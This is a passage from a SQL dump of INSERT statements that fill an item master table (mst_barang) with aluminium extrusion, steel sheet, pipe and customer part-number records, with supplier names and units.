'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0204', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2790', null, null, 'MF', '26124', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0205', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3930', null, null, 'MF', '27003', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0206', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1320', null, null, 'MF', '6819', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0207', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'NA', '8638', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0208', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'NA', '8650', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0209', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'BA', '8670', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0210', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2100', null, null, 'MF', '8673', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0211', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'MF', '8695', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0212', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '8695', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0213', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2990', null, null, 'NA', '9708', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0214', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '9711', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0215', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1990', null, null, 'NA', '9714', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0216', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '9714', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0217', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3920', null, null, 'MF', '9743', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0218', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'MF', '9744', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0219', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1990', null, null, 'NA', '9746', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0220', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '9746', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0221', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1990', null, null, 'NA', '9751', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0222', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1322', null, null, 'NA', '9752', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0223', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'MF', '9755', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0224', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1320', null, null, 'MF', '9763', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0225', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'MF', '9766', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0226', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3740', null, null, 'NA', '9768', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0227', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1320', null, null, 'NA', '9769', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0228', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'MF', '9770', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0229', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '9773', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0230', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3670', null, null, 'NA', '9774', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0231', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '9775', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REY-0001', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3790', null, null, 'YS-1N', '9K98047', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0002', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3576', null, null, 'YS-1', '9K98249', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0003', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3470', null, null, 'MF', '9K98305', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0004', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3650', null, null, 'YS-1', '9K98350', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0005', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3830', null, null, 'YS-1', '9K98351', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0006', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3650', null, null, 'YS-1', '9K98352', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0007', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'YS-1', '9K98353', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0008', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3830', null, null, 'YS-1', '9K98395', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0009', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3000', null, null, 'YS-1', '9K98395', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0010', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3920', null, null, 'YS-1', '9K98395', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0011', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4080', null, null, 'YS-1', '9K98395', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0012', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4140', null, null, 'YS-1', '9K98395', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0013', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3880', null, null, 'MF', '9K99411', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0014', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3040', null, null, 'MF', '9K99462', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0015', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'MF', '9K99464', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0016', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3790', null, null, 'YS-1N', '9K99637', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0017', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4220', null, null, 'YS-1N', '9K99638', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('REY-0018', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4400', null, null, 'YS-1N', '9K99638', 'KG', null, '', '', 'YKK'); INSERT INTO mst_barang VALUES ('RMO-0001', '1', 'RMO', '', 'Others', '', '', null, null, null, null, null, null, '', 'PIN HEAT SINK', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0001', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.3X180X960 SPTE', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0002', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8 X 91 X 1219 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0003', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.50x 114.20 SPTE', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0004', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.50x46 SPTE', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0005', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8X101 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0006', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8 X 44 X 1219 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0007', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8X16 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0008', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8X19 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0009', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8X32 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0010', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8X39, 80 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0011', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8X53 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0012', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8X54 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0013', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8X56 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0014', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8X66 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0015', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.80X30 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0016', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.80X34 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0017', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8x58 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0018', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X47.50X980 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0019', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X31.6X954 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0020', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X136X1000 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0021', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0x 62 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0022', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X46 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0023', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X42 ZSNC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0024', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.35X374X1341 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0025', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.35X154.50X1297 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0026', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.35X119.50X1377 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0027', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.35X112 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0028', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.35X71X1335 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0029', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '08 X19 SPCC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0030', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '05 X19 SPCC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0031', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.2X117X1219 SPCC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0032', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.6 X 110 X 1219 SPCC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0033', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.6X131.40X1219 SPCC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0034', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1,6X157X1219 SPCC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0035', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '2.0X188X1219 SPCC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0036', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '2.0X188X1290 SPCC', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0037', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '0.8x30 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0038', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '08x72x1219 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0039', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0 X 44 X 1219mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0040', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0 X 83 X 1219 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0041', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X38 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0042', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X46 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0043', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X52x1219 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0044', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X166 X 1219 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0045', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X60x1219 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0046', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X67X1163 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0047', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X72.50X1219 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0048', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X40X1219 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0049', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X120X1219 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0050', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.0X204X1000 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0051', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.5X1220X2440 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0052', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '2.0X1220X2440 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0053', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.2X38 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0054', '1', 'STL', '', 'Steel Pipe', '', '', null, null, null, null, null, null, '', '1.6 X 30 X 50 X 223', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0055', '1', 'STL', '', 'Steel Pipe', '', '', null, null, null, null, null, null, '', '2.3 X 30 X 60 X 670', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0056', '1', 'STL', '', 'Steel Pipe', '', '', null, null, null, null, null, null, '', '2.3 X 30 X 50 X 843', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0057', '1', 'STL', '', 'Steel Pipe', '', '', null, null, null, null, null, null, '', '2.3 X 30 X 50 X 2065', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0058', '1', 'STL', '', 'Steel Pipe', '', '', null, null, null, null, null, null, '', '1.2X17.5X17.5X382.50 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0059', '1', 'STL', '', 'Steel Pipe', '', '', null, null, null, null, null, null, '', '1.6X15.0X30X1391.50 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0060', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.2X102.50X 956 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0061', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.6 X 161 X 1219 ', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0062', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.6X54X1050 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0063', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '1.6X188X1219 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0064', '1', 'STL', '', 'Steel', '', '', null, null, null, null, null, null, '', '2.0x393.50x1093mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0065', '1', 'STL', '', 'Stainless Steel', '', '', null, null, null, null, null, null, '', 'Ø6 X 6M', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0066', '1', 'STL', '', 'Stainless Steel', '', '', null, null, null, null, null, null, '', 'Ø12 X 6M', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0067', '1', 'STL', '', 'Stainless Steel', '', '', null, null, null, null, null, null, '', 'Ø19.60X1.2X 2630', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0068', '1', 'STL', '', 'Stainless Steel', '', '', null, null, null, null, null, null, '', '304 5 / 8 X 6 M', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0069', '1', 'STL', '', 'Stainless Steel', '', '', null, null, null, null, null, null, '', 'Ø15.90X1.2X 1856', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0070', '1', 'STL', '', 'Stainless Steel', '', '', null, null, null, null, null, null, '', '05 X 76 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0071', '1', 'STL', '', 'Stainless Steel', '', '', null, null, null, null, null, null, '', '08 X 100 mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RMS-0072', '1', 'STL', '', 'Stainless Steel', '', '', null, null, null, null, null, null, '', '2.0x393.50x1083mm', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('RWP-0001', '1', 'RMO', '', 'Wire Pin', '', '', null, null, null, null, null, null, '', 'Wire Pin', 'KG', null, '', '', ''); INSERT INTO mst_barang VALUES ('WAB-0001', '11', '', 'VF2A00189400', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'ALL BRILIANT'); INSERT INTO mst_barang VALUES ('WGE-0001', '11', '', '101-08-178-80/500SERIES', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA ELECTRONIC'); INSERT INTO mst_barang VALUES ('WGE-0002', '11', '', '501-08-117-90', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA ELECTRONIC'); INSERT INTO mst_barang VALUES ('WGE-0003', '11', '', '501-08-127-40A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA ELECTRONIC'); INSERT INTO mst_barang VALUES ('WGE-0004', '11', '', '501-08-130-20A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA ELECTRONIC'); INSERT INTO mst_barang VALUES ('WGE-0005', '11', '', '501-08-131-30', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA ELECTRONIC'); INSERT INTO mst_barang VALUES ('WGE-0006', '11', '', '501-08-164-80', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA ELECTRONIC'); INSERT INTO mst_barang VALUES ('WGE-0007', '11', '', '501-08-150-20', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA ELECTRONIC'); INSERT INTO mst_barang VALUES ('WGE-0008', '11', '', '501-08-151-30', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA ELECTRONIC'); INSERT INTO mst_barang VALUES ('WGE-0009', '11', '', '501-08-152-60', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA ELECTRONIC'); INSERT INTO mst_barang VALUES ('WGE-0010', '11', '', '501-08-154-80', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA ELECTRONIC'); INSERT INTO mst_barang VALUES ('WGE-0011', '11', '', '501-08-155-70', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'TOA GALINDRA ELECTRONIC'); INSERT INTO mst_barang VALUES ('WIM-0001', '11', '', '446S267010 ( Fin only )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'IWAI METAL'); INSERT INTO mst_barang VALUES ('WJI-0001', '11', '', 'FSMH3001-201', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0002', '11', '', 'GE30938-003A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0003', '11', '', 'GE31894-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0004', '11', '', 'GE32360-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0005', '11', '', 'GE32823-004A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0006', '11', '', 'GE32823-007A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0007', '11', '', 'GE32823-009A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0008', '11', '', 'GE32823-010A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0009', '11', '', 'GE32927-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0010', '11', '', 'GE32927-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0011', '11', '', 'GE33234-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0012', '11', '', 'GE33234-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0013', '11', '', 'GE33323-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0014', '11', '', 'GE33323-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0015', '11', '', 'GE33544-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0016', '11', '', 'GE33962-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0017', '11', '', 'GE33962-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0018', '11', '', 'GE34070-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0019', '11', '', 'GE34070-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0020', '11', '', 'GE34070-003A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0021', '11', '', 'GE34070-004A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0022', '11', '', 'GE34810-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0023', '11', '', 'GE40107-002A t=1.5', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0024', '11', '', 'GE40124-003A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0025', '11', '', 'GE40172-005A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0026', '11', '', 'GE40395-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0027', '11', '', 'GE40395-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0028', '11', '', 'GE40395-005A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0029', '11', '', 'GE40395-006A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0030', '11', '', 'GE40499-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0031', '11', '', 'GE40499-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0032', '11', '', 'GE40642-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0033', '11', '', 'LV20916-003A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0034', '11', '', 'LV20916-004A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0035', '11', '', 'LV34061-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0036', '11', '', 'LV34655-001A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); INSERT INTO mst_barang VALUES ('WJI-0037', '11', '', 'LV34655-002A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'JVC'); 